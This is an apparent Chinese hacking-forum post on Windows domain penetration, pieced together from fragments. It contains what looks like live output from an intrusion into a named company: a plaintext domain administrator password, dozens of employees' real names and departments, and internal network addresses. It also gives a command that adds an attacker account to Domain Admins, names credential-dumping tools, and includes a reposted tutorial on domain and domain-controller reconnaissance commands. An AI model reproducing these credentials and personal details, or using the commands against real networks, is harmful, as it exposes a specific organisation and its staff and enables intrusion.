域渗透信息收集

0x02:域信息收集 
首先看看域管理员

Net group “domain admins” /domain

Net group “domain contronllers” /domain

dsquery server
"CN=OUTLOOK,CN=Servers,CN=Default-First-Site-

Name,CN=Sites,CN=Configuration,DC=sae-cctv,DC=cn"



UserName: administrator
LogonDomain: SAE-CCTV
password: saecctv131225



nltest /domain_trusts 出来的都是当前信任域、

ie密码读取器

cain直接读取本地存储的密码

dsquery  user
"CN=Administrator,CN=Users,DC=sae-cctv,DC=cn"
"CN=Guest,CN=Users,DC=sae-cctv,DC=cn"
"CN=SUPPORT_388945a0,CN=Users,DC=sae-cctv,DC=cn"
"CN=krbtgt,CN=Users,DC=sae-cctv,DC=cn"
"CN=IUSR_OUTLOOK,CN=Users,DC=sae-cctv,DC=cn"
"CN=IWAM_OUTLOOK,CN=Users,DC=sae-cctv,DC=cn"
"CN=SystemMailbox{57DDB824-1520-478D-8B8B-86F588E2F9C7},CN=Microsoft 

Exchange System Objects,DC=sae-cctv,DC=cn"
"CN=SystemMailbox{0E7F014A-8C1A-4345-B821-7993A176AC8D},CN=Microsoft 

Exchange System Objects,DC=sae-cctv,DC=cn"
"CN=SystemMailbox{D96EB262-D3FE-42D8-B94D-9BEF7C0E0192},CN=Microsoft 

Exchange System Objects,DC=sae-cctv,DC=cn"
"CN=SystemMailbox{67D15810-2598-45F7-887D-CD7888EADB76},CN=Microsoft 

Exchange System Objects,DC=sae-cctv,DC=cn"
"CN=SystemMailbox{6EB02A37-852E-4E69-9843-262E1849A605},CN=Microsoft 

Exchange System Objects,DC=sae-cctv,DC=cn"
"CN=SystemMailbox{E51CBF53-21AE-46D1-9973-38ABFE526121},CN=Microsoft 

Exchange System Objects,DC=sae-cctv,DC=cn"
"CN=UpdatusUser,CN=Users,DC=sae-cctv,DC=cn"
"CN=丁军庆,OU=行政人事部,OU=公司总部,DC=sae-cctv,DC=cn"
"CN=马洪琴,OU=行政人事部,OU=公司总部,DC=sae-cctv,DC=cn"
"CN=何金飞,OU=行政人事部,OU=公司总部,DC=sae-cctv,DC=cn"
"CN=罗穗芳,OU=离职人员,DC=sae-cctv,DC=cn"
"CN=王军,OU=财务部,OU=公司总部,DC=sae-cctv,DC=cn"
"CN=严志芬,OU=财务部,OU=公司总部,DC=sae-cctv,DC=cn"
"CN=李花白,OU=财务部,OU=公司总部,DC=sae-cctv,DC=cn"
"CN=张平,OU=财务部,OU=公司总部,DC=sae-cctv,DC=cn"
"CN=王明兰,OU=禁止QQ组,OU=国际业务部,OU=公司总部,DC=sae-cctv,DC=cn"
"CN=丁伟雪,OU=国内业务部,OU=公司总部,DC=sae-cctv,DC=cn"
"CN=冮永红,OU=离职人员,DC=sae-cctv,DC=cn"
"CN=李龙山,OU=国内业务部,OU=公司总部,DC=sae-cctv,DC=cn"
"CN=谭华宁,OU=国内业务部,OU=公司总部,DC=sae-cctv,DC=cn"
"CN=周启理,OU=国内业务部,OU=公司总部,DC=sae-cctv,DC=cn"
"CN=马小丽,OU=开发部,OU=公司总部,DC=sae-cctv,DC=cn"
"CN=陈艳青,OU=技术支持部,OU=公司总部,DC=sae-cctv,DC=cn"
"CN=陈畅伟,OU=开发二部,OU=开发部,OU=公司总部,DC=sae-cctv,DC=cn"
"CN=张齐伟,OU=开发部,OU=公司总部,DC=sae-cctv,DC=cn"
"CN=刘桂江,OU=开发二部,OU=开发部,OU=公司总部,DC=sae-cctv,DC=cn"
"CN=麦振伟,OU=技术支持部,OU=公司总部,DC=sae-cctv,DC=cn"
"CN=付志力,OU=离职人员,DC=sae-cctv,DC=cn"
"CN=徐优盛,OU=开发二部,OU=开发部,OU=公司总部,DC=sae-cctv,DC=cn"
"CN=李波,OU=开发二部,OU=开发部,OU=公司总部,DC=sae-cctv,DC=cn"
"CN=刘蓉杰,OU=开发二部,OU=开发部,OU=公司总部,DC=sae-cctv,DC=cn"
"CN=蔡钟焙,OU=技术支持部,OU=公司总部,DC=sae-cctv,DC=cn"
"CN=贾毅,OU=开发一部,OU=开发部,OU=公司总部,DC=sae-cctv,DC=cn"
"CN=代少敏,OU=离职人员,DC=sae-cctv,DC=cn"
"CN=刘样,OU=开发一部,OU=开发部,OU=公司总部,DC=sae-cctv,DC=cn"
"CN=方旭逢,OU=开发一部,OU=开发部,OU=公司总部,DC=sae-cctv,DC=cn"
"CN=郭文峰,OU=国内业务部,OU=公司总部,DC=sae-cctv,DC=cn"
"CN=罗兰贵,OU=测试部,OU=产品部,OU=技术支持部,OU=公司总部,DC=sae-

cctv,DC=cn"
"CN=周宏福,OU=开发一部,OU=开发部,OU=公司总部,DC=sae-cctv,DC=cn"
"CN=黄雷,OU=开发一部,OU=开发部,OU=公司总部,DC=sae-cctv,DC=cn"
"CN=潘加仕,OU=市场部,OU=国内业务部,OU=公司总部,DC=sae-cctv,DC=cn"
"CN=余卫琴,OU=离职人员,DC=sae-cctv,DC=cn"
"CN=周斌,OU=总经办,OU=公司总部,DC=sae-cctv,DC=cn"
"CN=伍志坚,OU=开发部,OU=公司总部,DC=sae-cctv,DC=cn"
"CN=周小容,OU=总经办,OU=公司总部,DC=sae-cctv,DC=cn"
"CN=邵红威,OU=总经办,OU=公司总部,DC=sae-cctv,DC=cn"
"CN=陈启军,OU=总经办,OU=公司总部,DC=sae-cctv,DC=cn"
"CN=吴洪英,OU=总经办,OU=公司总部,DC=sae-cctv,DC=cn"
"CN=毛建阳,OU=采购部,OU=工厂,DC=sae-cctv,DC=cn"
"CN=范绍琼,OU=采购部,OU=工厂,DC=sae-cctv,DC=cn"
"CN=毛珊珊,OU=离职人员,DC=sae-cctv,DC=cn"
"CN=陈上伟,OU=开发一部,OU=开发部,OU=公司总部,DC=sae-cctv,DC=cn"
"CN=王训清,OU=贵州工程部,OU=贵阳艾立克,OU=分公司外办,DC=sae-

cctv,DC=cn"
"CN=李华标,OU=贵州生产部,OU=贵阳艾立克,OU=分公司外办,DC=sae-

cctv,DC=cn"
"CN=李海瑶,OU=北京分公司,OU=分公司外办,DC=sae-cctv,DC=cn"
"CN=毕丹,OU=北京分公司,OU=分公司外办,DC=sae-cctv,DC=cn"
"CN=杜伟,OU=北京分公司,OU=分公司外办,DC=sae-cctv,DC=cn"
"CN=任兆征,OU=北京分公司,OU=分公司外办,DC=sae-cctv,DC=cn"
"CN=王文宝,OU=北京分公司,OU=分公司外办,DC=sae-cctv,DC=cn"
"CN=王学磊,OU=北京分公司,OU=分公司外办,DC=sae-cctv,DC=cn"
"CN=闫伟,OU=北京分公司,OU=分公司外办,DC=sae-cctv,DC=cn"
"CN=张永晗,OU=北京分公司,OU=分公司外办,DC=sae-cctv,DC=cn"
"CN=周华丽,OU=离职人员,DC=sae-cctv,DC=cn"
"CN=张立硕,OU=离职人员,DC=sae-cctv,DC=cn"
"CN=谢峰,OU=离职人员,DC=sae-cctv,DC=cn"
"CN=曹路,OU=开发二部,OU=开发部,OU=公司总部,DC=sae-cctv,DC=cn"
"CN=范莉娜,OU=北京研发中心,OU=分公司外办,DC=sae-cctv,DC=cn"
"CN=权秀琼,OU=北京研发中心,OU=分公司外办,DC=sae-cctv,DC=cn"
"CN=谢攀,OU=北京研发中心,OU=分公司外办,DC=sae-cctv,DC=cn"
"CN=张晓飞,OU=北京研发中心,OU=分公司外办,DC=sae-cctv,DC=cn"
"CN=鲁兵,OU=成都办事处,OU=分公司外办,DC=sae-cctv,DC=cn"
"CN=肖诗,OU=成都办事处,OU=分公司外办,DC=sae-cctv,DC=cn"
"CN=许丽君,OU=成都办事处,OU=分公司外办,DC=sae-cctv,DC=cn"
"CN=周康立,OU=物料部,OU=工厂,DC=sae-cctv,DC=cn"
"CN=程普,OU=贵阳艾立克,OU=分公司外办,DC=sae-cctv,DC=cn"
"CN=钟炜锋,OU=工厂离职,OU=离职人员,DC=sae-cctv,DC=cn"
"CN=周萍,OU=贵州财务部,OU=贵阳艾立克,OU=分公司外办,DC=sae-cctv,DC=cn"
"CN=张健敏,OU=上海分公司,OU=分公司外办,DC=sae-cctv,DC=cn"
"CN=陈嬿,OU=上海分公司,OU=分公司外办,DC=sae-cctv,DC=cn"
"CN=李平,OU=上海分公司,OU=分公司外办,DC=sae-cctv,DC=cn"
"CN=梁露,OU=上海分公司,OU=分公司外办,DC=sae-cctv,DC=cn"
"CN=邵裕节,OU=上海分公司,OU=分公司外办,DC=sae-cctv,DC=cn"
"CN=许旻旻,OU=南京办事处,OU=上海分公司,OU=分公司外办,DC=sae-

cctv,DC=cn"
"CN=程石,OU=上海分公司,OU=分公司外办,DC=sae-cctv,DC=cn"
"CN=汤静玮,OU=合肥办事处,OU=上海分公司,OU=分公司外办,DC=sae-

cctv,DC=cn"
"CN=aa,OU=开发部,OU=公司总部,DC=sae-cctv,DC=cn"
"CN=陈晓芳,OU=离职人员,DC=sae-cctv,DC=cn"
"CN=聂维,OU=贵州生产部,OU=贵阳艾立克,OU=分公司外办,DC=sae-cctv,DC=cn"
"CN=叶建中,OU=贵州工厂办,OU=贵阳艾立克,OU=分公司外办,DC=sae-

cctv,DC=cn"
"CN=彭程,OU=技术支持部,OU=公司总部,DC=sae-cctv,DC=cn"
"CN=伍涛,OU=售后服务部,OU=工厂,DC=sae-cctv,DC=cn"
"CN=李跃明,OU=贵州质控部,OU=贵阳艾立克,OU=分公司外办,DC=sae-

cctv,DC=cn"
"CN=孙昌秀,OU=贵州质控部,OU=贵阳艾立克,OU=分公司外办,DC=sae-

cctv,DC=cn"
"CN=李人崇,OU=贵州质控部,OU=贵阳艾立克,OU=分公司外办,DC=sae-

cctv,DC=cn"

Windows IP Configuration

   Host Name . . . . . . . . . . . . : oa
   Primary Dns Suffix  . . . . . . . : sae-cctv.cn
   Node Type . . . . . . . . . . . . : Unknown
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : sae-cctv.cn

Ethernet adapter 本地连接 2:

   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : Realtek RTL8139 Family PCI Fast 

Ethernet NIC
   Physical Address. . . . . . . . . : A0-00-00-04-C7-41
   DHCP Enabled. . . . . . . . . . . : No
   IP Address. . . . . . . . . . . . : 192.168.0.4
   Subnet Mask . . . . . . . . . . . : 255.255.252.0
   Default Gateway . . . . . . . . . : 192.168.0.11
   DNS Servers . . . . . . . . . . . : 192.168.0.13

Ethernet adapter 本地连接:

   Media State . . . . . . . . . . . : Media disconnected
   Description . . . . . . . . . . . : Realtek PCIe GBE Family 

Controller
   Physical Address. . . . . . . . . : 20-CF-30-14-B6-BA


net view 

服务器名称            注释

----------------------------------------------------------------------

---------
\\FILESBACKUP                                                          


\\FILESSERVER                                                          


\\GAOGUANGZU              192.168.3.164                                


\\HUANGJUNHUA                                                          


\\LIUXIAO                                                              


\\OA                                                                   


\\OUTLOOK                                                              


\\PC-201306031044                                                      


\\SAEFILE                                                              


\\SVN                                                                  


\\TERMINALSERVER          192.168.0.9                                  


\\UFIDA                                                                


\\UFTERMINAL                                                           


\\VPN                                                                  


\\ZHANGJIANGHUA                                                        


命令成功完成。


net view /domain

Domain

----------------------------------------------------------------------

---------
MSHOME               
MYGROUP              
SAE-CCTV             
WORKGROUP            
命令成功完成。

systeminfo

域:               sae-cctv.cn



Administrator
SAE-CCTV\Domain Admins
命令成功完成。



Tracert 58.60.185.171

Tracing route to 58.60.185.171 over a maximum of 30 hops

  1    <1 ms    <1 ms    <1 ms  192.168.0.11 
  2    <1 ms    <1 ms    <1 ms  58.60.185.14 
  3    <1 ms    <1 ms    <1 ms  58.60.185.171 

Trace complete.


Interface: 192.168.0.4 --- 0x10003
  Internet Address      Physical Address      Type
  192.168.0.11          00-09-0f-e4-f6-52     dynamic   
  192.168.0.13          00-1f-c6-45-a4-03     dynamic   
  192.168.1.86          00-1e-90-04-99-04     dynamic   
  192.168.1.207         14-da-e9-93-4d-7e     dynamic   

arp -d

Pinging 58.60.185.171 with 32 bytes of data:

Reply from 58.60.185.171: bytes=32 time=1ms TTL=252
Reply from 58.60.185.171: bytes=32 time<1ms TTL=252
Reply from 58.60.185.171: bytes=32 time<1ms TTL=252
Reply from 58.60.185.171: bytes=32 time<1ms TTL=252

Ping statistics for 58.60.185.171:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),


Interface: 192.168.0.4 --- 0x10003
  Internet Address      Physical Address      Type
  192.168.0.11          00-09-0f-e4-f6-52     dynamic   
  192.168.1.207         14-da-e9-93-4d-7e     dynamic   



本帖最后由 slip2008 于 2013-8-23 18:09 编辑


1、看了关于关于域渗透的几个疑惑,感觉域的渗透和平常的思路是不太一样的。所以找了一个视频和一些参考资料
2、域中添加管理员的命令为(前提是你先有一个域帐户)


dsadd user cn=test92,dc=dc13test,dc=com  -pwd 90sec@test -memberof "CN=Domain Admins,CN=Users,DC=dc13test,DC=com"
复制代码


     CN (Common Name),也就是你的帐户名
     第一个dc 为域名(dc13test)
     第二个dc 为扩展名(com)
     pwd 为你的密码
     -memberof 后面的意思是说,你要把用户添加到domain admins 组中。
域控下本来还有一个软件可以直接管理添加的


net view /domain:testdomain (testdomain 假设为目标的其中一个域)
net view /domain:SAE-CCTV

gsecdump


itle: 域内踩点——1获取域基本信息,2获取域控信息
文章将会对域内进行踩点获取内网结构的方法进行一个小的搜集和说明。对域内网的经验其实不多,同时也没有亲自组过成型的域内网,很多都是通过资料的整理以及微薄的经验及自己的理解经过的测试,希望能将这些方法系统的整理出来,有写的不严谨以及不正确的和需要补充的各种奇淫技巧希望读者提出来,希望能将内容更加的完善。
现规划的目录为:
1.获取域基本信息;
2.获取域控信息;
3.获取域内用户信息;
4.获取域的密码策略及其他信息;
(目录将调整Active Directory和LDAP协议、定位目标服务器、定位当前用户登录的机器)

域内踩点1——获取域基本信息
这部分主要是在于判断域存在的方法,下面是一些常用列举Windows域的方法。

1、ipconfig / ifconfig
大多数情况下,都是使用的IPCONFIG的命令,将获取一个DHCP分配的IP地址相关联的域。这是一个比较简单原始的方法。
Command: ipconfig /all
但是这个需要注意的是:ipconfig看到的是内网DNS搜索后缀,大部分时间是域的名字,有时候不是,ipconfig看到的名称可以是自定义的。所以此法可以作为参考。


2、NBTSTAT
NBTSTAT 是一个很好用的windows命令行的工具,可以通过nbstat命令来列举域和工作组以及计算机名称等。下面是一些简单的命令示例:
Command (单个IP): nbtstat -AN <IP ADDRESS>
Command (解析域的单一IP): nbtstat -AN <IP ADDRESS> | grep -i “<1E>” | gawk -F ” ” “{print $1}” | uniq | sort  <1E>
Command (解析域的IP列表): FOR /F “tokens=*” %i in (‘type iplist.txt’) do nbtstat -AN %i | grep -i “<1E>” | gawk -F ” ” “{print $1}” | uniq | sort >>domainlist.txt


3、NMAP列表扫描
结合一下简单的脚本,可以在NMAP列表扫描的结果中筛选出网络中与域相关的列表
Command: nmap -sL <IP Range> -oA output_rnds
Command: grep -i -v “()” output_rdns.gnmap | grep -i -v “nmap” | gawk -F “(” “{print $2}” | gawk -F “)” “{print $1}” | sed s/^\./:/1 | gawk -F “:” “{print $2}” | sort | uniq


4、Reverseraider
Reverseraider工具在BackTrack系统中有,
类似于nmap的一个扫描工具。
位于/pentest/enumeration/reverseraider
Command: ./reverseraider -r <IP 范围>


5、嗅探
嗅探一般可以获取到整个网络结构信息,嗅探浏览器以及DNS流量的域信息。常见的嗅探工具包括Wireshark, TCPdump, Cain, and Network Minor.

6、RDP
这个好理解,直接远程过去看到windows的登录界面,在登录时的下拉视图中就有域的选择。
Command (扫描开启了3389的机器列表): nmap –sS –PN –p3389


7、net命令
Net view命令显示的是由指定的计算机共享的域、计算机或资源的列表。如果在没有参数的情况下使用,则 net view 显示当前域中的计算机列表。
可以参考:http://technet.microsoft.com/zh-cn/library/dd260012(WS.10).aspx
Command :
net view /domain,可以看到有几个域
net view /domain:域名 是看每个域中有多少台机器
net group "domain admins" /domain 是可以看到域管理员的名字,运气好的情况下是直接可以看到域服务器是哪一台

(其他的方法:)
8、NLTEST
Nltest是内置于 Windows Server 2008 和 Windows Server 2008 R2 的命令行工具。 如果有 AD DS 或 AD LDS 服务器,就可以使用Nltest。 如果安装AD域服务工具的一部分的远程服务器管理工具 (RSAT),也会有Nltest。
Nltest.exe能够用来测试一个域中的域控制器和运行Windows NT的域成员之间的信任关系。其实还有其他的工具的强力扫描,也可以达到通用的效果,如Nessus,NeXpose,IP360以及空SMB登录等。
NTLTEST使用可以参考:http://technet.microsoft.com/zh-cn/library/cc731935
Command: NLTEST  /DOMAIN_TRUSTS <server>

9、通过Dns信息收集
工具:dnswalk, (dnstracer,dnsenum)
DNSwalk是DNS debugger,用于域的转换和查询数据库。
命令行中的域名必须以.结尾,你可有使用普通域名例如:dnswalk example.com. 或者反域名例如: dnswalk 3.2.1.in-addr.arpa

Back Track的默认路径在/pentest/enumeration/dns
下载地址:http://sourceforge.net/projects/dnswalk/
cd /pentest/enumeration/dns
./DNSWalk xx.com.(注意域名结尾都有一个小数点.表明结束)
./DNSWalk -o -s xx.com.
-o 在DNSWalk记录最后产生一个概览记录
-s 设定最初发出查询的DNS服务器
这个小工具还可以列出部分分站。

命令举例:
Command: ./dnswalk example.com.


域内踩点2——获取域控信息
得到域控往往是域内渗透的一个关键,这部分主要是刺探域控在网络中的位置。下面是一些常用列举Windows域控的方法。

1、DNS Lookup
据笔者所知,这是目前最快捷的方法。当服务器升级到域控制器时,DNS服务项会自动添加LDAP,Kerberos等,这样就可以只要一个基本的DNS服务查询来获取这些服务器的列表。可以通过与本地的非域的Windows系统的nskookup命令来查找域控。

Command: nslookup -type=SRV _ldap._tcp.<domain>


2、NLTEST
Nltest可以通过广播请求来测试查询一个列表域控制器。在前面文字中也提到过。
NTLTEST使用可以参考:http://technet.microsoft.com/zh-cn/library/cc731935
Command  : nltest /dclist: <domain>


3、FindPDC
FindPDC是Joe Richards (joeware.com)写的一个工具。通过本机窗口API调用,可以确定主域控制器的位置。
Command: findpdc /<domain>


4、NMAP 端口扫描
简单的扫描LDAP端口636和389可以辅助查找域控制器的位置。它不能保证你查找到存活端口的服务器就是域控,但至少可以排除和辅助查找。
Command: nmap –sV –PN –p636,389 <host or range>


5、Adfind (LDAP查询)
adfind 是 Active Directory 的命令行查询工具。
Adfind 类似于 dsquery。Adfind是Joe Richards(joeware.com)的另一种工具,可以允许用户查询域控制器的列表。这里主要用到的是,如果没有域用户的身份,是不能够创建一个null/bind的和完全使用LDAP目录的。(LDAP Miner,LDAP Browser,以及windows的LDAP explorer,这些都是有界面的可以操作LDAP的一些工具。)
Command: adfind -b -sc dcdmp <domain> -gc | grep -i “>name:” | gawk -F ” ” “{print $2}” | sort | uniq


6、Net Group 命令
“net group”是windows自带的一个命令,可以查询域控信息,不过只有在域成员的机器上才有用。
Command: net group "Domain Controllers" /domain


7、dsquery命令
Dsquery按照指定的条件查询 Active Directory。下列每个 dsquery 命令都查找指定对象类型的对象,dsquery * 除外,它可以查询任何对象类型。
Command:
查找目前域内所有DC:
dsquery server dsquery server -o rdn
寻找域example.com中,属于通用类别目录服务器的所有DC:
dsquery server -domain example.com -isgc

评论回复